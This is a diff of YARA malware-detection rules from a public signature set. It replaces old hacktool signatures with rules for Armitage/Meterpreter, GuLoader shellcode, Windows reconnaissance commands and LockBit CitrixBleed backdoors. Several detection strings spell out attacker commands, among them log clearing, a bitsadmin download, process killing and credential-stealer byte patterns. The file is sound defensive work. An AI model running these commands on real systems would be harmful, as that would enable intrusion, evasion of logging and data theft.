-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2628-L2645"
+		id = "c49fdb73-1c95-5c63-b039-2fddb77290dc"
+		date = "2017-12-24"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_armitage.yar#L33-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
-		logic_hash = "01840f4df12fbf6f5f27a3050c841002678605cd373e9ea9b182b2026caa29f9"
-		score = 60
+		logic_hash = "3a21a42df8f15e3e81c797feb284edfe2de7d1c182547e8606f0e48dc08f6939"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b258b2f12f57ed05d8eafd29e9ecc126ae301ead9944a616b87c240bf1e71f9a"
+		hash2 = "144cb6b1cf52e60f16b45ddf1633132c75de393c2705773b9f67fce334a3c8b8"
 
 	strings:
-		$s0 = "Packed by exe32pack" ascii
-		$s1 = "2TInject.Dll" fullword ascii
-		$s2 = "Windows Services" fullword ascii
-		$s3 = "Findrst6" fullword ascii
-		$s4 = "Press Any Key To Continue......" fullword ascii
+		$s1 = "session.meterpreter_read" fullword ascii
+		$s2 = "sniffer_dump" fullword ascii
+		$s3 = "keyscan_dump" fullword ascii
+		$s4 = "MeterpreterSession.java" fullword ascii
 
 	condition:
-		all of them
+		filesize < 30KB and 1 of them
 }
-rule SIGNATURE_BASE_Gina_Zip_Folder_Gina
+rule SIGNATURE_BASE_Armitage_OSX : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file gina.dll"
+		description = "Detects Armitage component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7ebc7218-9c7b-5595-ae7b-f316fc99d1f6"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2647-L2667"
+		id = "e886e866-c163-56fb-9631-c586e9f23f9e"
+		date = "2017-12-24"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_armitage.yar#L52-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
-		logic_hash = "1344634346f9e7e3ef96c901705ac7bd4aa9a70cfbebf71c8222544e84ca9f98"
-		score = 60
+		logic_hash = "25c94b9715fdc10d0e04eea7d5b9974e60f3e248f51b80de80542b169996fc7a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2680d9900a057d553fcb28d84cdc41c3fc18fd224a88a32ee14c9c1b501a86af"
+		hash2 = "b7b506f38d0553cd2beb4111c7ef383c821f04cee5169fed2ef5d869c9fbfab3"
 
 	strings:
-		$s0 = "NEWGINA.dll" fullword ascii
-		$s1 = "LOADER ERROR" fullword ascii
-		$s3 = "WlxActivateUserShell" fullword ascii
-		$s6 = "WlxWkstaLockedSAS" fullword ascii
-		$s13 = "WlxIsLockOk" fullword ascii
-		$s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s16 = "WlxShutdown" fullword ascii
-		$s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+		$x1 = "resources/covertvpn-injector.exe" fullword ascii
+		$s10 = "resources/browserpivot.x64.dll" fullword ascii
+		$s17 = "resources/msfrpcd_new.bat" fullword ascii
 
 	condition:
-		all of them
+		filesize < 6000KB and 1 of them
 }
-rule SIGNATURE_BASE_Superscan3_0
+rule SIGNATURE_BASE_MAL_Crime_Win32_Loader_Guloader_1_Experimental : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d22aa3ae-4c62-5007-896d-7c473f0421a6"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2669-L2690"
+		description = "Detects injected GuLoader shellcode bin"
+		author = "@VK_Intel"
+		id = "c37882c6-15dc-54dc-8c10-7e91ea0fc6bd"
+		date = "2020-05-04"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/VK_Intel/status/1257206565146370050"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_guloader.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
-		logic_hash = "448d3af61062c53c5b148e58697537bd98316e6c6d4d9ed9e0ff36cbd5a0b4f5"
-		score = 60
+		logic_hash = "03b7e0251b1c08798ce310cc4c11adfaa3071409d608c91c30d5fc7e28a079de"
+		score = 50
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		tlp = "white"
 
 	strings:
-		$s0 = "\\scanner.ini" ascii
-		$s1 = "\\scanner.exe" ascii
-		$s2 = "\\scanner.lst" ascii
-		$s4 = "\\hensss.lst" ascii
-		$s5 = "STUB32.EXE" fullword wide
-		$s6 = "STUB.EXE" fullword wide
-		$s8 = "\\ws2check.exe" ascii
-		$s9 = "\\trojans.lst" ascii
-		$s10 = "1996 InstallShield Software Corporation" fullword wide
+		$djib2_hash = { f8 8b ?? ?? ?? ba 05 15 00 00 89 d3 39 c0 c1 e2 05 81 ff f6 62 f1 87 01 da 0f ?? ?? d9 d0 01 da 83 c6 02 66 ?? ?? ?? 75 ?? c2 04 00}
+		$nt_inject_loader = {8b ?? ?? ba 44 1a 0e 9e 39 d2 e8 ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? f8 ba d0 e0 8b 30 e8 ?? ?? ?? ?? d9 d0 89 ?? ?? d9 d0 81 fb 20 af 00 00 8b ?? ?? 39 c9 ba 92 a7 f3 95 e8 ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? 39 d2 ba d0 20 2e d0 e8 ?? ?? ?? ?? 89 ?? ?? f8 8b ?? ?? ba 6a 19 1f 23 d9 d0 e8 ?? ?? ?? ?? d9 d0 89 ?? ?? 81 fb e4 8c 00 00 39 c9 8b ?? ?? ba 19 50 9c c2 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 39 d2 8b ?? ?? fc ba 3d 13 8e 8b e8 ?? ?? ?? ?? d9 d0 89 ?? ?? f8 8b ?? ?? ba 30 3d 7b 2c e8 ?? ?? ?? ??}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Sig_238_Xsniff
+rule SIGNATURE_BASE_Recon_Commands_Windows_Gen1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
+		description = "Detects a set of reconnaissance commands on Windows systems"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1e61a732-8691-5f84-beb0-c9f7e6d46538"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2692-L2713"
+		id = "bc95265c-780d-5451-bd12-d14495877e46"
+		date = "2017-07-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/MSJCxP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_recon_indicators.yar#L12-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
-		logic_hash = "90c08db197a00885ffc62967bd814479a438f500316cf65e81fcec617517dd9c"
+		logic_hash = "36beb09c428949140cb007c1022c385c9a1ae4eea8c1f1a419f96b36b8030c7c"
 		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
-		$s3 = "%s - simple sniffer for win2000" fullword ascii
-		$s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
-		$s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii
-		$s7 = "http://www.xfocus.org" fullword ascii
-		$s9 = "  -pass        : Filter username/password" fullword ascii
-		$s18 = "  -udp         : Output udp packets" fullword ascii
-		$s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii
-		$s20 = "  -tcp         : Output tcp packets" fullword ascii
+		$s1 = "netstat -an" ascii
+		$s2 = "net view" ascii fullword
+		$s3 = "net user" ascii fullword
+		$s4 = "whoami" ascii
+		$s5 = "tasklist /v" ascii
+		$s6 = "systeminfo" ascii
+		$s7 = "net localgroup administrators" ascii
+		$s8 = "net user administrator" ascii
+		$s9 = "regedit -e " ascii
+		$s10 = "tasklist /svc" ascii
+		$s11 = "regsvr32 /s /u " ascii
+		$s12 = "CreateObject(\"WScript.Shell\").RegWrite" ascii
+		$s13 = "bitsadmin /rawreturn /transfer getfile" ascii
+		$s14 = "wmic qfe list full" ascii
+		$s15 = "schtasks.exe /create " ascii nocase
+		$s16 = "wmic share get" ascii
+		$s17 = "wmic nteventlog get" ascii
+		$s18 = "wevtutil cl " ascii
+		$s19 = "sc query type= service" ascii
+		$s20 = "arp -a " ascii
+		$fp1 = "avdapp.dll" fullword wide
+		$fp2 = "keyword.command.batchfile" ascii
+		$fp3 = ".sublime-settings" ascii
 
 	condition:
-		6 of them
+		filesize < 1000KB and 4 of them and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Sig_238_Fscan
+rule SIGNATURE_BASE_SUSP_Recon_Outputs_Jun20_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file fscan.exe"
+		description = "Detects outputs of many different commands often used for reconnaissance purposes"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7af4d38a-bc88-57ba-b602-4e01d3d95015"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2715-L2736"
+		id = "ec3759aa-212f-52ce-9f38-636accd35749"
+		date = "2020-06-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/cycldek-bridging-the-air-gap/97157/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_recon_indicators.yar#L52-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
-		logic_hash = "0af558345e8c85021fd4f8d399dacb3b6e8d9c692060c31a36e943fc48bfabff"
+		logic_hash = "652b28bfb45a11eaaee198c76560c1f55edc5b32c5394e606bb5426551260f24"
 		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "FScan v1.12 - Command line port scanner." fullword ascii
-		$s2 = " -n    - no port scanning - only pinging (unless you use -q)" fullword ascii
-		$s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii
-		$s6 = " -z    - maximum simultaneous threads to use for scanning" fullword ascii
-		$s12 = "Failed to open the IP list file \"%s\"" fullword ascii
-		$s13 = "http://www.foundstone.com" fullword ascii
-		$s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii
-		$s18 = "Bind port number out of range. Using system default." fullword ascii
-		$s19 = "fscan.exe" fullword wide
+		$s1 = ". . . . : Yes" ascii
+		$s2 = "with 32 bytes of data:" ascii
+		$s3 = "ff-ff-ff-ff-ff-ff     static" ascii
+		$s4 = "  TCP    0.0.0.0:445" ascii
+		$s5 = "System Idle Process" ascii
 
 	condition:
-		4 of them
+		filesize < 150KB and 4 of them
 }
-rule SIGNATURE_BASE__Iissample_Nesscan_Twwwscan
+rule SIGNATURE_BASE_MAL_Backdoor_DLL_Nov23_1 : CVE_2023_4966 FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a710ca8e-54dc-5a98-b173-c87b22af745f"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2738-L2764"
+		description = "Detects a backdoor DLL, that was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
+		author = "X__Junior"
+		id = "3588d437-b561-5380-8dac-73a31f4cdb5a"
+		date = "2023-11-23"
+		modified = "2023-12-05"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6088dd060507f4efa2f4c1770dc746100966e8a7475859918488d7be6c96bc31"
-		score = 60
+		logic_hash = "6788d37301bb82bd4d9584e192e2fb14d4f6c77801b70299097d8ba139219394"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
-		hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
-		hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
+		tags = "CVE-2023-4966, FILE"
+		hash1 = "cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63"
+		hash2 = "0eb66eebb9b4d671f759fb2e8b239e8a6ab193a732da8583e6e8721a2670a96d"
 
 	strings:
-		$s0 = "Connecting HTTP Port - Result: " fullword
-		$s1 = "No space for command line argument vector" fullword
-		$s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
-		$s5 = "No space for copy of command line" fullword
-		$s7 = "-  Windows NT,2000 Patch Method  - " fullword
-		$s8 = "scanf : floating point formats not linked" fullword
-		$s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
-		$s13 = "!\"what?\"" fullword
-		$s14 = "%s Port %d Closed" fullword
-		$s16 = "printf : floating point formats not linked" fullword
-		$s17 = "xxtype.cpp" fullword
+		$s1 = "ERROR GET INTERVAL" ascii
+		$s2 = "OFF HIDDEN MODE" ascii
+		$s3 = "commandMod:" ascii
+		$s4 = "RESULT:" ascii
+		$op1 = { C7 44 24 ?? 01 00 00 00 C7 84 24 ?? ?? ?? ?? FF FF FF FF 83 7C 24 ?? 00 74 ?? 83 BC 24 ?? ?? ?? ?? 00 74 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 00 04 00 00 48 8D 94 24 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 }
+		$op2 = { 48 C7 44 24 ?? 00 00 00 00 C7 44 24 ?? 00 00 00 00 C7 44 24 ?? 03 00 00 00 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 4C 8D 0D ?? ?? ?? ?? 44 0F B7 05 ?? ?? ?? ?? 48 8B D0 48 8B 4C 24 ?? FF 15 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE__Fshttp_Fspop_Fssniffer
+rule SIGNATURE_BASE_MAL_Trojan_DLL_Nov23 : CVE_2023_4966 FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5ca543af-2589-52b0-83f9-ad25ba76b633"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2766-L2792"
+		description = "Detects a trojan DLL that installs other components - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
+		author = "X__Junior"
+		id = "1dd87d0a-2b8b-5386-8fdd-40d184c731a4"
+		date = "2023-11-23"
+		modified = "2023-12-05"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L24-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "50c91f1036ae467de51227b6782978c33607f94724d2e1b0af7c958028a84b48"
-		score = 60
+		logic_hash = "9be42742711b4d0440244b507945e074b61c456588580b3263f899a7eb84d8aa"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
-		hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
-		hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
+		tags = "CVE-2023-4966, FILE"
+		hash1 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068"
 
 	strings:
-		$s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword
-		$s1 = "-ERR Get SMS Users ID Failed" fullword
-		$s2 = "Control Time Out 90 Secs, Connection Closed" fullword
-		$s3 = "-ERR Post SMS Failed" fullword
-		$s4 = "Current.hlt" fullword
-		$s6 = "Histroy.hlt" fullword
-		$s7 = "-ERR Send SMS Failed" fullword
-		$s12 = "-ERR Change Password <New Password>" fullword
-		$s17 = "+OK Send SMS Succussifully" fullword
-		$s18 = "+OK Set New Password: [%s]" fullword
-		$s19 = "CHANGE PASSWORD" fullword
+		$op1 = { C7 84 24 ?? ?? ?? ?? 52 70 63 53 C7 84 24 ?? ?? ?? ?? 74 72 69 6E C7 84 24 ?? ?? ?? ?? 67 42 69 6E C7 84 24 ?? ?? ?? ?? 64 69 6E 67 C7 84 24 ?? ?? ?? ?? 43 6F 6D 70 C7 84 24 ?? ?? ?? ?? 6F 73 65 41 C7 84 24 ?? ?? ?? ?? 00 40 01 01 }
+		$op2 = { C7 84 24 ?? ?? ?? ?? 6C 73 61 73 C7 84 24 ?? ?? ?? ?? 73 70 69 72 66 C7 84 24 ?? ?? 00 00 70 63 }
+		$op3 = { C7 84 24 ?? ?? ?? ?? 4E 64 72 43 C7 84 24 ?? ?? ?? ?? 6C 69 65 6E C7 84 24 ?? ?? ?? ?? 74 43 61 6C C7 84 24 ?? ?? ?? ?? 6C 33 00 8D }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Ammyy_Admin_AA_V3
+rule SIGNATURE_BASE_MAL_DLL_Stealer_Nov23 : CVE_2023_4966 FILE
 {
 	meta:
-		description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bb140cb7-9f56-5acb-883e-080dfd3f60d5"
-		date = "2014-12-22"
-		modified = "2025-04-14"
-		reference = "http://goo.gl/gkAg2E"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2794-L2818"
+		description = "Detects a DLL that steals authentication credentials - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
+		author = "X__Junior"
+		id = "9cfed8ec-1d04-53d7-88ef-2576075cfc33"
+		date = "2023-11-23"
+		modified = "2023-12-05"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L41-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6ab1de9f3b58cdb2c03f2d72986772333f8b81c98e6cbfd941f20b2fed1c5ff2"
-		score = 55
+		logic_hash = "7d0c46d855973cb2c0636aed9c67cfbe47ca260ab1bc842fef1d532725c26910"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"
-		hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"
+		tags = "CVE-2023-4966, FILE"
+		hash1 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994"
 
 	strings:
-		$x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii
-		$x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii
-		$x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii
-		$x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii
-		$x5 = "Please enter password for accessing remote computer" fullword ascii
-		$s1 = "CreateProcess1()#3 %d error=%d" fullword ascii
-		$s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii
-		$s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii
-		$s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii
+		$op1 = { C7 45 ?? 4D 69 6E 69 C7 45 ?? 44 75 6D 70 C7 45 ?? 57 72 69 74 C7 45 ?? 65 44 75 6D C7 45 ?? 70 00 27 00 C7 45 ?? 44 00 62 00 C7 45 ?? 67 00 68 00 C7 45 ?? 65 00 6C 00 C7 45 ?? 70 00 2E 00 C7 45 ?? 64 00 6C 00 C7 45 ?? 6C 00 00 00}
 
 	condition:
-		2 of ( $x* ) or all of ( $s* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Linuxhacktool_Eyes_Scanssh
+rule SIGNATURE_BASE_MAL_Python_Backdoor_Script_Nov23 : CVE_2023_4966 FILE
 {
 	meta:
-		description = "Linux hack tools - file scanssh"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9546d0d8-42af-5b4c-ac93-195d14bfbb5b"
-		date = "2015-01-19"
-		modified = "2025-04-14"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2822-L2847"
+		description = "Detects a trojan (written in Python) that communicates with c2 - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
+		author = "X__Junior"
+		id = "861f9ce3-3c54-5c56-b50b-2b7536783f6e"
+		date = "2023-11-23"
+		modified = "2023-12-05"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L56-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
-		logic_hash = "cb20c28f1767ce23f60c377943d8a129fa069b1a1407bbaf43370f0ff79ade30"
-		score = 75
+		logic_hash = "b336f6438a420af49b1b0144039f1051f12c0c54f77a94e2f947f71d1f6230b3"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-4966, FILE"
+		hash1 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6"
 
 	strings:
-		$s0 = "Connection closed by remote host" fullword ascii
-		$s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii
-		$s2 = "Remote connection closed by signal SIG%s %s" fullword ascii
-		$s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii
-		$s5 = "Server closed connection" fullword ascii
-		$s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
-		$s8 = "checking for version `%s' in file %s required by file %s" fullword ascii
-		$s9 = "Remote host closed connection" fullword ascii
-		$s10 = "%s: line %d: bad command `%s'" fullword ascii
-		$s13 = "verifying that server is a known host : file %s not found" fullword ascii
-		$s14 = "%s: line %d: expected service, found `%s'" fullword ascii
-		$s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii
-		$s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii
+		$s1 = "port = 443 if \"https\"" ascii
+		$s2 = "winrm.Session basic error" ascii
+		$s3 = "Windwoscmd.run_cmd(str(cmd))" ascii
 
 	condition:
-		all of them
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Linuxhacktool_Eyes_Pscan2
+rule SIGNATURE_BASE_APT_RANSOM_Lockbit_Forensicartifacts_Nov23
 {
 	meta:
-		description = "Linux hack tools - file pscan2"
-		author = "Florian Roth (Nextron Systems)"
-		id = "02d96766-6696-5410-ad48-bd8cb642ac51"
-		date = "2015-01-19"
-		modified = "2025-04-14"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2849-L2867"
+		description = "Detects patterns found in Lockbit TA attacks exploiting Citrixbleed vulnerability CVE 2023-4966"
+		author = "Florian Roth"
+		id = "04bde599-2a5b-5a33-a6f1-67d57a564946"
+		date = "2023-11-22"
+		modified = "2023-12-05"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L73-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "56b476cba702a4423a2d805a412cae8ef4330905"
-		logic_hash = "3686ccbd53a6dcedf9b10d131a1fc76b51b265328ad10f63671b64d4bf57a0b6"
+		logic_hash = "6ba1d47e2cac72143c4612c420777024f114afc007c7b15251a58819654aeff1"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii
-		$s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii
-		$s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii
-		$s8 = "Invalid IP." fullword ascii
-		$s9 = "# scanning: " fullword ascii
-		$s10 = "Unable to allocate socket." fullword ascii
+		$x1 = "taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe"
+		$x2 = " 1> \\\\127.0.0.1\\admin$\\__"
 
 	condition:
-		2 of them
+		1 of ( $x* )
 }
-rule SIGNATURE_BASE_Linuxhacktool_Eyes_A
+
+rule SIGNATURE_BASE_Tophat_Malware_Jan18_1 : FILE
 {
 	meta:
-		description = "Linux hack tools - file a"
+		description = "Detects malware from TopHat campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2b4f52d4-b438-5040-89c5-aab1df15200e"
-		date = "2015-01-19"
-		modified = "2025-04-14"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2869-L2887"
+		id = "ec290eee-a21e-548d-b7cc-3e25e7c39d22"
+		date = "2018-01-29"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tophat.yar#L13-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
-		logic_hash = "a246eb907fd6525c96c911acde6b513fca68248ef8d4f8fa64039791942950ab"
+		logic_hash = "69a1e1105b28d66203f74e68038efacc926e501e28a73865485adf2fd7fc0ac0"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5c0b253966befd57f4d22548f01116ffa367d027f162514c1b043a747bead596"
